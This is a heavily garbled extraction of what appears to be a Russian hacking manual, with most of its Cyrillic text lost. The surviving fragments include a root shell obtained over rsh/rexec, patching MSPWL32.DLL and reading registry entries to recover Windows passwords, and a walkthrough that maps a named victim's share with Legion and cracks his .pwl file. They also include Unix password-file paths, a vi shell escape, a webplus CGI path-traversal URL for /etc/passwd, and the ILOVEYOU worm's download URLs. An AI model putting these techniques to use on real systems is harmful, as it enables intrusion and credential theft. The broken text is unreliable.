log. ,

root (/etc/default/login).

devil# rsh l smtp xxxx.xxx.ru

/bin/csh i

Warning: no access to tty; thus no

job control in this shell

# iduid=0(root) gid=0(root)

devil# nc v xxxx.xxx.ru 512

xxxx.xxx.ru [194.85.xxx.xxx] 512

(exec) open

^@root^@rootpasswd^@/bin/csh i^@

Warning: no access to tty; thus nojob control in this shell

# id

uid=0(root) gid=1(other)

9. .

,

, . .rhosts hosts.equiv., ,

, . DNS NIS .

EssentialNetTools 2.2 , Internet , EssentialNetTools 2.2. . , . ,

133 134

. , ,

, Add Record. . , : ,


68/112

,

(pwl, user.dar, system.dat ...). , Internet, Microsoft,

.

(EssentialNetTools ). NBScan IP

, . , RS YES, IP NATShell(starting ip = ending ip), use default NAT list . Go ( , ).

, . LMHost IP ,

, IP

. : NBScan, Open Computer. ,, ,

Share. Share Name \\\ , , Mount.

,

.

NetTool (, Essential) , ,

( , NBScan , ).

135 136

Internet

, , . .


69/112

, .

. ,

. : , .

Internet , , .

. ,

: , ( , ). :

, , , , , , ,

. : ,, ?: ( ) , .

.

, , : ,

. : Lta13?Lp ! : ! ,

137 138

: ,, .. ,

. , , .


70/112

!

, , . DialUp . , . , , ,

, . , , : , Internet .

Windows

95/98? , Windows 95/98 , PWL. ,

, , (,), PWL. ,

, ,

(HIEW, QVIEW), . MSPWL32.DLL. . ( N) . .

N (X). X+N, 8 , (Y). X+Y, 8, (Z).

XOR Z , , ( , ?). ? ( ).

( ), XOR. , . , xor

139 140

byte ptr [eax+ebp],cl. , ? ,

.

, ,


71/112

. ,

30h,0Ch, 28h . . MSPWL32.DLL , 511h ( , ), 90h,90h, 90h NOP (). ,

! ? ! . !!! , : / , , !

, , . , Windows : .,

MSDOS, , .

, , PWL, Windows :

, ,

Windows , . ? ! ! USER.DAT! : Windows 95 M. D.! , Internet,

email . , , , , ( ). email, ( ). :

M. D.! POP3 , DialUp! ? . email PWL, USER.DAT, , , ! ??? !

UUE, , 8 10. .

141 142

10 . 30h, , 7Ah,

30h 9 10

. ! , no sex for you. ,


72/112

30h, 9 10

. . , 3Dh. , 0Dh( ) + 30h. 0Dh, 0Ah: .

, , : ! , . : Internet Mail, & reg; . REGEDIT, HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail/POP3/: Password. Internet Mail. ,

, . , , , , .

. REGEDIT, / . , (*) .. . , () 3Dh

! 15.

? ,, , , ? !

, USER.DAT.HKEY_CURRENT_USER/RemoteAcce

ss/Addresses: . , , ,! ,

, ( XOR). ASCII (, , ,

143 144

, : , , ?)

SPYWIN, HOOKDUMP, KEYWITNESS. ,


73/112

?).

HKEY_CURRENT_USER/RemoteAccess/Profile

/""/IP: 0Ch

DNS,

..

HKEY_CURRENT_USER/RemoteAccess/Profile

/ ""/User: .HKEY_CURRENT_USER/Software/Microsoft/

Windows/CurrentVersion/InternetSetting

s/ProxyServer: Proxy .

HKEY_CURRENT_USER/Software/Microsoft/I

nternetMail and News/Mail:

DefaultPOP3Server:

DefaultSMTPServer:

SenderEMail:

Name:

Organization:

.

POP3 "POP3":

Account: Password: ,

, ? , ? .

.

, .

: Internet.

! , , , , .

, , , ? , ,

Internet ,, . , ( )

145 146

. ,

. ? Windows 95/98/NT Legion. IP


74/112

, , ,

, , . , , , Internet,

, . , , ,

. , ?

, . , Windows 95/98/NT ,

, . , IP

IP,

. , . ,

www.lamerishe.ru. mIRC, IRC status : /whois*.lamerishe.ru.

:

#RUSSIAN Andrey H andrey@dialup

28059.lamerishe.ru :0 hello.*.junk.com

End of /WHO list.

:

/dns Andrey

mIRC IP

:*** Looking up dialup

28059.lamerishe.ru

*** Resolved dialup

28059.lamerishe.ru to 121.31.21.10

147 148

IP (121.31.21.10) . IP

Windows. MSDOS. e: Enter


75/112

IP .

Legion Enter Start IP ( IP) Enter End IP ( IP).

Enter Start IP: 121.31.21.1

Enter End IP: 121.31.21.254

Scan. , , \\121.31.21.87\C, IP C.

MAPPED ONDRIVE E:. , IP , c ( ) . . (

), , , . , .pwl, .

Enter.

. Windows . : E:\>dir win* :

: 224715D0

:\WIN95 113098 6:48p WIN95

0 (,) 0

1 (,) 287,997,952

:

E:\>cd win95E:\WIN95>dir *.pwl

: 224715D0

:\WIN95

ANDREY PWL 730 020599 10:31p

ANDREY.PWL

1 (,) 730

0 (,) 287,997,952

E:\WIN95>copy andrey.pwl

c:\hacking\pwlhack

149 150

, .pwl, .

Internet. :

: L5tRe

fsa3Xfa12


76/112

,

E:\121.31.21.87\C, . . ? pwlhack andrey.pwl.

C:\HACKING\PWLHACK>pwlhack.exe /list

andrey.pwl andrey(C) 17Apr1998y by Hard Wisdom

"PWL's Hacker" v3.0 (1996,97,98)

Enter the password:

File 'ANDREY.PWL' has size 730

bytes, version [NEW_Win95_OSR/2]

for user 'ANDREY' with password ''

contains:

[Type][The resource location

string][Password]

Dial X *Rna\

lamerishe\L5tRe fsa3Xfa12

Indexed Entryes: 1; Number of

resources: 1.

!, , ,

: fsa3Xfa12

Internet,, , ( www.lamerishe.ru) ,

Internet. , .

,

Netbus1.0, Netbus Pro 2.0,BackOrifice .. , , IP , , ,

IP.. .

, ? . .

151 152


77/112

PGPMail .

.

. , , . , Del


78/112

. . . , INF (

). http://www.xakep.ru/soft/5/reg2inf.exe. , , . , INF

, CSU , :

[Version]

Signature="$$"

LayoutFile=bla.inf

[DefaultInstall]

DelReg=del.Reg

[del.Reg]

HKCU,"SOFTWARE\Microsoft\Internet

Explorer\main","Home Page"

,

Add :

0,""

. , INF CSU.INF ( , ,

, ). :

RUNDLL.EXE

SETUPX.DLL,InstallHinfSection

DefaultInstall 64 c:\csu.inf

.

. USER.DA0 SYSTEM.DA0 ( backup ). , . ,

CSU.INF, CSUADD.INF, :

RUNDLL.EXE

SETUPX.DLL,InstallHinfSection

155 156


79/112

, :

(Windows 9x

GetTickCount() ) . , ,


80/112

(Windows 9x,Windows NT).

LAN Manager( NT: 4.00 NT4,5.00 Windows 2000).

: Master Browser,Backup Browser, PDC,BDC, RAS dialin server.

, ,

, Windows NT. netuse \\1.2.3.4\IPC$ password /user:username. ,

shared resources, , , .

(

Guest, . shared resources .

, . , .

, shared resources.

:

NetBIOS overTCP/IP 135

139 firewall

159 160

1 HKLM\System\CurrentControlS

( , ; ).


81/112

et\Control\Lsa\RestrictAnonymous

Guest

loginstation restrictions

account lockout , , ,

.

NT IP (NetBIOS , ).

: ANONYMOUS, ( )

, .

, ( 6 ). Dual Celeron 400MHz96Mb RAM 128 .

. Intruders list,

BlackICE, .

254

161 162

.

:

Null session 102

6.7%

Guest 1 57

3.7%


82/112

:

10% Windows

40% Windows, NetBIOS

over TCP/IP, ()

share, Internet,

: Windows NT, (CONNECT: Administrator:.

1524

100%

ping 442

29%

2 453.0%

1 .. IPC$

2 , .

102 100%

Windows 95/98 58 57%

Windows NT SAMBA 44 43%

177 100%

10 6%

,

10 6%

Shared resources

278 100%

171 62%

91 33%

163 164


83/112

telnet c 139 . nbtstat. , Windows 95

IP , ScanRange/Enter Start IP Scan Range/EnterEnd IP. ,


84/112

Windows NT, ,, , .

LEGION 2.1

Legion 2.1, Rhino9,

share , . , .

IP, . x.x.x.1 x.x.x.255, . Scan Type/Scan Range,

10.20.30.1 10.20.31.255 10.20.30.x 10.20.31.x. , IP , IP. Connection Speed Scan.

:

IP

.

A,M C 195.239.3.48 SPEDIA 195.239.3.64.

167 168

MapDrive, Windows.

LAN NetBios. , .

Legion IP


85/112

. NT4 Server Workstation, Windows 95/98. Pentium 100, 32 MBRAM, Windows NT4 / Windows98, 28.8 kbpsmodem. .

Legion NetBios

LAN, , firewall

g

. , . ,

.

Legion NT5

Legion NT5, .

Internet . , . , .,

169 170

, . , ,

.


86/112

,, , , . , , ,

distributed.net, RSA RC5 64 .

, , , .

, , , . , , , , ,

.

. , , .

, . , .

171 172


87/112

. ,

) (UNIX/UNIX; ROOT/ROOT;ADMIN/ADMIN; SHELL/SHELL;GUEST/GUEST ..). Ha UNIXe

(


88/112

. , . , .

Internet:

, UNIX,

shell.

UNIXshella , (

( ) etc, passwd. , , , : ( ) passwd. , ,

. Ha 10 200 . , , UNIX Crack , DOS CrackerJack.

,

175 176

*, .

/etc/shadow

/ t / it /* d t b


89/112

, , . :

/etc/security/passwd /tcb/auth/files/ /

/tcb/files/auth/?/ /etc/master.passwd /etc/shadpw /etc/shadow /etc/tcb/aa/user/ /.secure/etc/passwd /etc/passwd[.dir|.pag] /etc/security/passwd.adjunct ##username /etc/shadow

/etc/security/* database /etc/auth[.dir|.pag] /etc/udbHo ,

. . ( ) getpwent(), pp (www.spider.ru) pp

. p, , passwd : +::0:0:::. ,

NIS (Network InformationServer)/YP (Yelow Pages). , ypcat passwd .

177 178

VMS, SYS$SYSTEM:SYSUAF.DAT. VMS

Internet


90/112

CHECK_PASSWORD GUESS_PASSWORD, , , .

shell. vi :set shell=/bin/sh, shell :shell. , passwd, . , /etc/utmp,/usr/adm/wtmp, /usr/adm/lastlog.

vi , .

( ) Internet , ,

. Internet , Internet . .

. , , . . .. @

. , @ , :[email protected]. ( , ,

179 180

, :name_prov_login.txt).

,

. , , IP, .

transparent proxy server


91/112

. , ( , , , ,

). . passlist.zip (*.zip ) http://www.astalavista.box.sk/, , , . , , , ,name_prov_pass.txt, , .

proxyserver

no transparentproxyserver,

transparent proxy server . , . , email. email IP. , proxyserver. , . IP Kiss.Ru. , , , , IP.

:

IP

var ip=document.f1.ip.value;

181 182

document.write(ip);

//>

login. . , , ,


92/112

, , IP. CGI. , , . . ADDR HOST, , notransparent.

WWW .

, , NEWBUGS , , . . , . ,

, . . , FTPd, . . , HACKCRACK, HACKZONE HOLM . DoS ( ), shell. .

rootshell.

CGI. CGI, (Perl, PHP, CGI).

CGI CitForum. , . ( ) CGI,

183 184

. ! printstat.cgi. :

printstat cgi?action=print&con=con&con

. 195.34.32.10. http://195.34.32.10/cgibin/webplus?scripts=/../../../../etc/passwd.

!


93/112

printstat.cgi?action print&con con&con2=lpt1&id=csu

CSU. , con2

, , (, lpt1, print. display ..). , , GRINDER. . , , UNIX. . IP . ,

, . , 1.1.1.1 255.255.255.255 /cgibin/webplus.cgi. IP,

! . . John the Ripper. , , . .

VBS.LOVELETTER

ILOVE YOU. ,

( Outlook LotusNotes). ILOVEYOU, kindlycheck the attached LOVELETTER comingfrom me. LOVE

LETTERFORYOU.TXT.vbs. c:\windows Win32DLL.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\

185 186

RunServices\Win32DLL. c:\windows\system MSKernel32.vbs LOVELETTERFORYOU.TXT.vbs.

MSKernel32 vbs

http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk

4jnHHGbvbmKLJKjhkqj4w/WIN BUGSFIX


94/112

MSKernel32.vbs HKEY_LOCAL_MASCHINE\Software\Microsoft\CurrentVersion\RunServices\MSKernel32.

. , c:\windows\system\LOVELETTERFORYOU.TXT.vbs. , .

WINFAT32.EXE , Internet WINBUGSFIX.EXE. , :

http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WINBUGSFIX.exe

4jnHHGbvbmKLJKjhkqj4w/WINBUGSFIX.exe

http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b

3Vbvg/WINBUGSFIX.exe

http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxc

bvnmadshfgqw237461234iuy7thjg/WINBUGSFIX.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN

BUGSFIX. about:blank (). , . ( FAT32). ,

187 188

, . . WINBUGSFIX.EXE

,

. . ,

. ,


95/112

, . .jpg, .jpeg, .js, .vbs, .css,.vbe, .jse, .hta, .sct, .whs, . mp2 mp3. hidden , vbs. , queen_tsmgo.mp3, queen_tsmgo.mp3.vbs. c:\windows\system LOVE

LETTERFORYOU.HTM, MSKernel32.vbs.

mIRC SCRIPTS.INI (

. mIRC , . ). , IRC, . , .

. , . Veryfunny, Joke Mothers Day OrderConfirmation ( mothersday.vbs). . . , . , , .jpg .INI .BAT.

, . .

, , .

Context kindlycheck the attached LOVELETTER comingfrom me. email [email protected] [email protected].

189 190


96/112

XXX . (, copy,from . . ,

).

type=button, submit, reset, text ), checked / . ,

.


97/112

) ,

METHOD. ( , ): POST GET. POST

, GET . , ACTION=http://csu.ru/cgibin/xxx.cgi, : uname=hellerpasswd=xxxxxxxx,

http://csu.ru/cgibin/xxx.cgi?umane=heller&passwd=xxxxxxxx.

. : . : type ( INPUT. ,button , reset

, submit ,text , radio ( ) checkbox ),name , value (

, (:

action="mailto:[email protected]?Subject=

"CSU"")

( ), , , .

VBScript. ,

. :

,

,

>

VBSCRIPT

193 194

. . PLAY. sub

PLAY end sub ./


98/112

/body

, . ONCLICK=PLAY(). , , PLAY. JavaScript. VBScript , HTML. VBScript HTML

>

. , Script, .

, ( HTML VBScript , JavaScript).

dim c

/ . c . :

c=document.f1.t1.value

, . :

document.f1.t2.value=c

! :

,

,

>

VBSCRIPT

195 196

dim csub play

value=Enter onclick=play()>


99/112

p y

c=document.f1.t1.value

document.f1.t1.value=c

end sub

>

. . HTML. :

1 100

:


100/112

1 100

v=cInt(v)

if qv then

alert " "


101/112

:

dim qdim v

dim p

randomize

sub start

q=int(rnd(1)*100+1)

p=0

alert " 1 100"end sub

sub play

p=p+1

v=document.f1.t1.value

if q=v then

document.write ("

"&p&" ")

end if

end sub

>

,

, . . , .

( ), . , ( )

201 202

. . ,

, . ,

. .

,


102/112

., .

, . . .

, , , . , . Legion.

. IP , Map Drive. , .

Legion 2.1? . , , Net BIOSa ,

, . , sharinga. EssentialNetTools, Legion, .

scriptkiddie. cgibugs cgi .

cgi Voideye. , ,Damned CGI Scanner 2.1. . , , , void.ru .

203 204

Internet.

.


103/112

, , , cgi.

,

. , , , .. . . .

, DCS 2.1 Essential Tools, . , Xavior .

. , .

( ). .

Internet. .

, ,

, , . : ( ) ,

, . , ......

205 206

1 . ,

, .. , .. ,

, .

.

.


104/112

. :

, 13 , , . .

.

, .

.

.

.

, . ,

:,

?

, , ?

. Internet .

207 208

, , 6 .

?

,

, , .. , .

, ,


105/112

. 40 . , .

?

!

( ) ,

( ) . . , , . , ,

, , .

.

. ,

, , .

, ?

, ?

? ???

. , . . .

: ,, , .

, . ?

209 210

???

.

, . hacker.

31337.?

1. , . .

2. ,


106/112

! .

.

. , . .

2 . . , , . ,

. . .

, .

3. ,

, , . , Inetfordollars, [email protected],

.4.

, email telnet ,

., [email protected], :[email protected].

211 212

5. , , .

6.

( ) . ,

, , Internet.


107/112

.

7. .

, , , . , Internet.

Spedia

, Internet . , ,

, .

, ,

, , !

,

.

Spedia! , 0.60$ ,

, . , ?, . Internet

, , , . , , ?

213 214

Spedia , , . 2 .

30 . $ .

25% ;

, ;


108/112

300 ! : :

, , Internet, , ,

0.5 ; ,

(email) ;

, , ;

,

.

Spediabar, , , Tools Make Money Download. .

, ! !

215 216

WWW ( www.mail.ru)

A V Komlin avkvladru@netscape net

[email protected]

http://cyberportal.narod.ru

: tHe karamba

IPtools

: Pupkin Zade


109/112

A.V. Komlin [email protected]

(http://dore.on.ru/kpnc)

FINNAN ([email protected])

: Choosen

:

ANSI.SYS

: Alexander Ermakov

AVP

: ZaDNiCa

AVP

: dr.golova

*.BAT ? *.BAT !

: gaszZone

: PupkinZade

http://kssoft.mastak.com/users/kssoft/iptools.eng/index.htm

IPX

:

(user manual)

: zLOB

http://zlob.bos.ru

MTC: Cfyz

CD KERNEL32.DLL

: Green Mouse

: http://www.emedia.ru/

: Travelling Wind

http://rayon.promedia.minsk.by

217 218

: Reanimator

: zLOB

http://www.zlob.net.ru/

T l t

!

http://www.4prohack.cjb.net

Windows Internet

Maxim V. Stepin. EMail: [email protected]


110/112

Telnet

: =Sky12dooR=

.

: Yarix;

Windows

: =BFG=

Windows:

: Epsilon

:

MOOF ([email protected]; http://AnyNews.da.ru)

Hacker Team

hacker [email protected]

FAQ

relcom.fido.ru.hacker

[email protected]

[email protected]

Windows Internet

[email protected].

DS Windows

4prohack

http://www.4prohack.cjb.net

[email protected]

Windows

GrayFlint

219 220

. . . . . . . . . . . . . . . . . . .3

? 10

Internet: . . . . . . . . . . . . . . . . . . . . .175

Internet . . . . . . . .180

proxyserver . . . . . . . . . . . . . . . . . . . . . . . . .181

WWW . . . . . . . . . . . . . . . .183

C C


111/112

? . . . . . .10

exploit? . . . . . . . . . . . . . . . . . . . . . .28

root? . . . . . . . . . . . . . . . . . . . . . . . .30

! . . . . . . . . . . . . . . . . . . . . . .38

. . . . . . . . . . . . . . . .49

UIN: Bugs, Crack SocialIngineering . . . . . . . . . . . . . . . . . . . . . . . . . . . .50

Internet . . . . . . . . .62

. . .78

. . . . . .116 . . . . . . . . . . . . . . . . . . . . . . . . . .134

Internet . . . . . . . . . . . . . . . . . . . .137

. . . . . . . . . . . . . . . . . . . . . . . . . .153

shared Internet . .157

Internet Windows Me . . . . . . . . . . . . .165

LEGION 2.1 . . . . . . . . .167

. . . . . . . . . . . . .170

VBS.LOVELETTER . . . . . . . . . . . . . . . . . . . . . . .186

VBScript . . . . . . . . . . . . . . . . . . . . . .192

, . . . . . . .202

. . . . . . . . . . . . . . .206

Spedia . . . . . . . . . . . . . . . . . . . . . . . . . .213

. . . . . .219

221 222


112/112

:

.127591, , ., . 53. . 1.

http://www.bookpress.ru

223

levin m. haking 1

Documents